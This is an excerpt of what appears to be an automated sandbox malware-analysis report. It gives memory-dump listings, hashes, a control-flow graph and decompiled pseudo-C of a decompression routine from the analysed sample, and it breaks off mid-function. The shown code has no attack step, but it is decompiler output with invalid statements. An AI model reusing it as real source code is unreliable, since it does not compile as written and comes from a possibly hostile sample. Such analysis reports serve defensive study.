                                                          0x00407376
                                                          0x00407376
                                                          0x00407379
                                                          0x0040737c
                                                          0x0040737f
                                                          0x00407382
                                                          0x00407385
                                                          0x00407389
                                                          0x0040738b
                                                          0x0040738e
                                                          0x00000000
                                                          0x00407390
                                                          0x00407390
                                                          0x0040710d
                                                          0x0040710d
                                                          0x00000000
                                                          0x0040710d
                                                          0x0040738e
                                                          0x004075c3
                                                          0x004075c3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x004075fa
                                                          0x004075fa
                                                          0x00000000
                                                          0x004075fa
                                                          0x00407447
                                                          0x004074c7
                                                          0x00407490

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                          • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                          • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                          • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 712 407395-407399 713 4073bb-4073c8 712->713 714 40739b-40749d 712->714 716 4073cb-4073e0 713->716 724 4074c7-4074cb 714->724 717 4073e2-4073f8 716->717 718 4073fa-407410 716->718 720 407413-40741a 717->720 718->720 722 407441 720->722 723 40741c-407420 720->723 729 407447-40744d 722->729 727 407426-40743e 723->727 728 4075cf-4075d9 723->728 725 40752b-40753e 724->725 726 4074cd-4074ee 724->726 725->729 730 4074f0-407505 726->730 731 407507-40751a 726->731 727->722 732 4075e5-4075f8 728->732 734 406bf2 729->734 735 4075fa 729->735 736 40751d-407524 730->736 731->736 737 4075fd-407601 732->737 738 406bf9-406bfd 734->738 739 406d39-406d5a 734->739 740 406c9e-406ca2 734->740 741 406d0e-406d12 734->741 735->737 742 4074c4 736->742 743 407526 736->743 738->732 744 406c03-406c10 738->744 739->716 748 406ca8-406cc1 740->748 749 40754e-407558 740->749 745 406d18-406d2c 741->745 746 40755d-407567 741->746 742->724 750 4074a9-4074c1 743->750 751 4075db 743->751 744->735 752 406c16-406c5c 744->752 753 406d2f-406d37 745->753 746->732 754 406cc4-406cc8 748->754 749->732 750->742 751->732 755 406c84-406c86 752->755 756 406c5e-406c62 752->756 753->739 753->741 754->740 757 406cca-406cd0 754->757 762 406c94-406c9c 755->762 763 406c88-406c92 755->763 760 406c64-406c67 GlobalFree 756->760 761 406c6d-406c7b GlobalAlloc 756->761 758 406cd2-406cd9 757->758 759 406cfa-406d0c 757->759 764 406ce4-406cf4 GlobalAlloc 758->764 765 406cdb-406cde GlobalFree 758->765 759->753 760->761 761->735 766 406c81 761->766 762->754 763->762 763->763 764->735 764->759 765->764 766->755
                                                          C-Code - Quality: 98%
                                                          			E00407395() {
                                                          				void _t533;
                                                          				signed int _t534;
                                                          				signed int _t535;
                                                          				signed int* _t605;
                                                          				void* _t612;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					if( *(_t612 - 0x40) != 0) {
                                                          						 *(_t612 - 0x84) = 0x13;
                                                          						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                          						goto L132;
                                                          					} else {
                                                          						__eax =  *(__ebp - 0x4c);
                                                          						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          						__ecx =  *(__ebp - 0x58);
                                                          						__eax =  *(__ebp - 0x4c) << 4;
                                                          						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          						L130:
                                                          						 *(__ebp - 0x58) = __eax;
                                                          						 *(__ebp - 0x40) = 3;
                                                          						L144:
                                                          						 *(__ebp - 0x7c) = 0x14;
                                                          						L145:
                                                          						__eax =  *(__ebp - 0x40);
                                                          						 *(__ebp - 0x50) = 1;
                                                          						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                          						L149:
                                                          						if( *(__ebp - 0x48) <= 0) {
                                                          							__ecx =  *(__ebp - 0x40);
                                                          							__ebx =  *(__ebp - 0x50);
                                                          							0 = 1;
                                                          							__eax = 1 << __cl;
                                                          							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                          							__eax =  *(__ebp - 0x7c);
                                                          							 *(__ebp - 0x44) = __ebx;
                                                          							while(1) {
                                                          								L140:
                                                          								 *(_t612 - 0x88) = _t533;
                                                          								while(1) {
                                                          									L1:
                                                          									_t534 =  *(_t612 - 0x88);
                                                          									if(_t534 > 0x1c) {
                                                          										break;
                                                          									}
                                                          									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                          										case 0:
                                                          											if( *(_t612 - 0x6c) == 0) {
                                                          												goto L170;
                                                          											}
                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                          											_t534 =  *( *(_t612 - 0x70));
                                                          											if(_t534 > 0xe1) {
                                                          												goto L171;
                                                          											}
                                                          											_t538 = _t534 & 0x000000ff;
                                                          											_push(0x2d);
                                                          											asm("cdq");
                                                          											_pop(_t569);
                                                          											_push(9);
                                                          											_pop(_t570);
                                                          											_t608 = _t538 / _t569;
                                                          											_t540 = _t538 % _t569 & 0x000000ff;
                                                          											asm("cdq");
                                                          											_t603 = _t540 % _t570 & 0x000000ff;
                                                          											 *(_t612 - 0x3c) = _t603;
                                                          											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                          											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                          											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                          											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                          												L10:
                                                          												if(_t611 == 0) {
                                                          													L12:
                                                          													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                          													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                          													goto L15;
                                                          												} else {
                                                          													goto L11;
                                                          												}
                                                          												do {
                                                          													L11:
                                                          													_t611 = _t611 - 1;
                                                          													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                          												} while (_t611 != 0);
                                                          												goto L12;
                                                          											}
                                                          											if( *(_t612 - 4) != 0) {
                                                          												GlobalFree( *(_t612 - 4));
                                                          											}
                                                          											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                          											 *(_t612 - 4) = _t534;
                                                          											if(_t534 == 0) {
                                                          												goto L171;
                                                          											} else {
                                                          												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                          												goto L10;
                                                          											}
                                                          										case 1:
                                                          											L13:
                                                          											__eflags =  *(_t612 - 0x6c);
                                                          											if( *(_t612 - 0x6c) == 0) {
                                                          												 *(_t612 - 0x88) = 1;
                                                          												goto L170;
                                                          											}
                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                          											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                          											_t45 = _t612 - 0x48;
                                                          											 *_t45 =  *(_t612 - 0x48) + 1;
                                                          											__eflags =  *_t45;
                                                          											L15:
                                                          											if( *(_t612 - 0x48) < 4) {
                                                          												goto L13;
                                                          											}
                                                          											_t546 =  *(_t612 - 0x40);
                                                          											if(_t546 ==  *(_t612 - 0x74)) {
                                                          												L20:
                                                          												 *(_t612 - 0x48) = 5;
                                                          												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                          												goto L23;
                                                          											}
                                                          											 *(_t612 - 0x74) = _t546;
                                                          											if( *(_t612 - 8) != 0) {
                                                          												GlobalFree( *(_t612 - 8));
                                                          											}
                                                          											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                          											 *(_t612 - 8) = _t534;
                                                          											if(_t534 == 0) {
                                                          												goto L171;
                                                          											} else {
                                                          												goto L20;
                                                          											}
                                                          										case 2:
                                                          											L24:
                                                          											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                          											 *(_t612 - 0x84) = 6;
                                                          											 *(_t612 - 0x4c) = _t553;
                                                          											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                          											goto L132;
                                                          										case 3:
                                                          											L21:
                                                          											__eflags =  *(_t612 - 0x6c);
                                                          											if( *(_t612 - 0x6c) == 0) {
                                                          												 *(_t612 - 0x88) = 3;
                                                          												goto L170;
                                                          											}
                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                          											_t67 = _t612 - 0x70;
                                                          											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                          											__eflags =  *_t67;
                                                          											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                          											L23:
                                                          											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                          											if( *(_t612 - 0x48) != 0) {
                                                          												goto L21;
                                                          											}
                                                          											goto L24;
                                                          										case 4:
                                                          											L133:
                                                          											_t531 =  *_t605;
                                                          											_t588 = _t531 & 0x0000ffff;
                                                          											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                          											if( *(_t612 - 0xc) >= _t564) {
                                                          												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                          												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                          												 *(_t612 - 0x40) = 1;
                                                          												_t532 = _t531 - (_t531 >> 5);
                                                          												__eflags = _t532;
                                                          												 *_t605 = _t532;
                                                          											} else {
                                                          												 *(_t612 - 0x10) = _t564;
                                                          												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                          												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                          											}
                                                          											if( *(_t612 - 0x10) >= 0x1000000) {
                                                          												goto L139;
                                                          											} else {
                                                          												goto L137;
                                                          											}
                                                          										case 5:
                                                          											L137:
                                                          											if( *(_t612 - 0x6c) == 0) {
                                                          												 *(_t612 - 0x88) = 5;
                                                          												goto L170;
                                                          											}
                                                          											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                          											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                          											L139:
                                                          											_t533 =  *(_t612 - 0x84);
                                                          											goto L140;
                                                          										case 6:
                                                          											__edx = 0;
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) = 1;
                                                          												 *(__ebp - 0x84) = 7;
                                                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                          												goto L132;
                                                          											}
                                                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          											__esi =  *(__ebp - 0x60);
                                                          											__cl = 8;
                                                          											__cl = 8 -  *(__ebp - 0x3c);
                                                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          											__ecx =  *(__ebp - 0x3c);
                                                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          											__ecx =  *(__ebp - 4);
                                                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          											__eflags =  *(__ebp - 0x38) - 4;
                                                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          											if( *(__ebp - 0x38) >= 4) {
                                                          												__eflags =  *(__ebp - 0x38) - 0xa;
                                                          												if( *(__ebp - 0x38) >= 0xa) {
                                                          													_t98 = __ebp - 0x38;
                                                          													 *_t98 =  *(__ebp - 0x38) - 6;
                                                          													__eflags =  *_t98;
                                                          												} else {
                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          												}
                                                          											} else {
                                                          												 *(__ebp - 0x38) = 0;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x34) - __edx;
                                                          											if( *(__ebp - 0x34) == __edx) {
                                                          												__ebx = 0;
                                                          												__ebx = 1;
                                                          												goto L61;
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__ecx =  *(__ebp - 8);
                                                          												__ebx = 0;
                                                          												__ebx = 1;
                                                          												__al =  *((intOrPtr*)(__eax + __ecx));
                                                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          												goto L41;
                                                          											}
                                                          										case 7:
                                                          											__eflags =  *(__ebp - 0x40) - 1;
                                                          											if( *(__ebp - 0x40) != 1) {
                                                          												__eax =  *(__ebp - 0x24);
                                                          												 *(__ebp - 0x80) = 0x16;
                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          												__eax =  *(__ebp - 0x28);
                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          												__al = __al & 0x000000fd;
                                                          												__eax = (__eflags >= 0) - 1 + 0xa;
                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                          												__eax =  *(__ebp - 4);
                                                          												__eax =  *(__ebp - 4) + 0x664;
                                                          												__eflags = __eax;
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												goto L69;
                                                          											}
                                                          											__eax =  *(__ebp - 4);
                                                          											__ecx =  *(__ebp - 0x38);
                                                          											 *(__ebp - 0x84) = 8;
                                                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                          											goto L132;
                                                          										case 8:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x84) = 0xa;
                                                          												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x38);
                                                          												__ecx =  *(__ebp - 4);
                                                          												__eax =  *(__ebp - 0x38) + 0xf;
                                                          												 *(__ebp - 0x84) = 9;
                                                          												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                          											}
                                                          											goto L132;
                                                          										case 9:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												goto L90;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x60);
                                                          											if( *(__ebp - 0x60) == 0) {
                                                          												goto L171;
                                                          											}
                                                          											__eax = 0;
                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                          											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                          											__eflags = _t259;
                                                          											0 | _t259 = _t259 + _t259 + 9;
                                                          											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                          											goto L76;
                                                          										case 0xa:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x84) = 0xb;
                                                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                          												goto L132;
                                                          											}
                                                          											__eax =  *(__ebp - 0x28);
                                                          											goto L89;
                                                          										case 0xb:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__ecx =  *(__ebp - 0x24);
                                                          												__eax =  *(__ebp - 0x20);
                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x24);
                                                          											}
                                                          											__ecx =  *(__ebp - 0x28);
                                                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          											L89:
                                                          											__ecx =  *(__ebp - 0x2c);
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          											L90:
                                                          											__eax =  *(__ebp - 4);
                                                          											 *(__ebp - 0x80) = 0x15;
                                                          											__eax =  *(__ebp - 4) + 0xa68;
                                                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                          											goto L69;
                                                          										case 0xc:
                                                          											L100:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xc;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t335 = __ebp - 0x70;
                                                          											 *_t335 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t335;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											__eax =  *(__ebp - 0x2c);
                                                          											goto L102;
                                                          										case 0xd:
                                                          											L37:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xd;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t122 = __ebp - 0x70;
                                                          											 *_t122 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t122;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L39:
                                                          											__eax =  *(__ebp - 0x40);
                                                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          												goto L48;
                                                          											}
                                                          											__eflags = __ebx - 0x100;
                                                          											if(__ebx >= 0x100) {
                                                          												goto L54;
                                                          											}
                                                          											L41:
                                                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          											 *(__ebp - 0x48) = __eax;
                                                          											__eax = __eax + 1;
                                                          											__eax = __eax << 8;
                                                          											__eax = __eax + __ebx;
                                                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          											__ax =  *__esi;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__edx = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												 *(__ebp - 0x40) = 1;
                                                          												__cx = __ax >> 5;
                                                          												__eflags = __eax;
                                                          												__ebx = __ebx + __ebx + 1;
                                                          												 *__esi = __ax;
                                                          											} else {
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edx;
                                                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          												__ebx = __ebx + __ebx;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											 *(__ebp - 0x44) = __ebx;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L39;
                                                          											} else {
                                                          												goto L37;
                                                          											}
                                                          										case 0xe:
                                                          											L46:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xe;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t156 = __ebp - 0x70;
                                                          											 *_t156 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t156;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											while(1) {
                                                          												L48:
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													break;
                                                          												}
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__edx = __ebx + __ebx;
                                                          												__ecx =  *(__ebp - 0x10);
                                                          												__esi = __edx + __eax;
                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													_t170 = __edx + 1; // 0x1
                                                          													__ebx = _t170;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													continue;
                                                          												} else {
                                                          													goto L46;
                                                          												}
                                                          											}
                                                          											L54:
                                                          											_t173 = __ebp - 0x34;
                                                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                          											__eflags =  *_t173;
                                                          											goto L55;
                                                          										case 0xf:
                                                          											L58:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xf;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t203 = __ebp - 0x70;
                                                          											 *_t203 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t203;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L60:
                                                          											__eflags = __ebx - 0x100;
                                                          											if(__ebx >= 0x100) {
                                                          												L55:
                                                          												__al =  *(__ebp - 0x44);
                                                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          												goto L56;
                                                          											}
                                                          											L61:
                                                          											__eax =  *(__ebp - 0x58);
                                                          											__edx = __ebx + __ebx;
                                                          											__ecx =  *(__ebp - 0x10);
                                                          											__esi = __edx + __eax;
                                                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          											__ax =  *__esi;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__edi = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												_t217 = __edx + 1; // 0x1
                                                          												__ebx = _t217;
                                                          												__cx = __ax >> 5;
                                                          												__eflags = __eax;
                                                          												 *__esi = __ax;
                                                          											} else {
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edi;
                                                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          												__ebx = __ebx + __ebx;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											 *(__ebp - 0x44) = __ebx;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L60;
                                                          											} else {
                                                          												goto L58;
                                                          											}
                                                          										case 0x10:
                                                          											L110:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0x10;
                                                          												goto L170;
                                                          											}
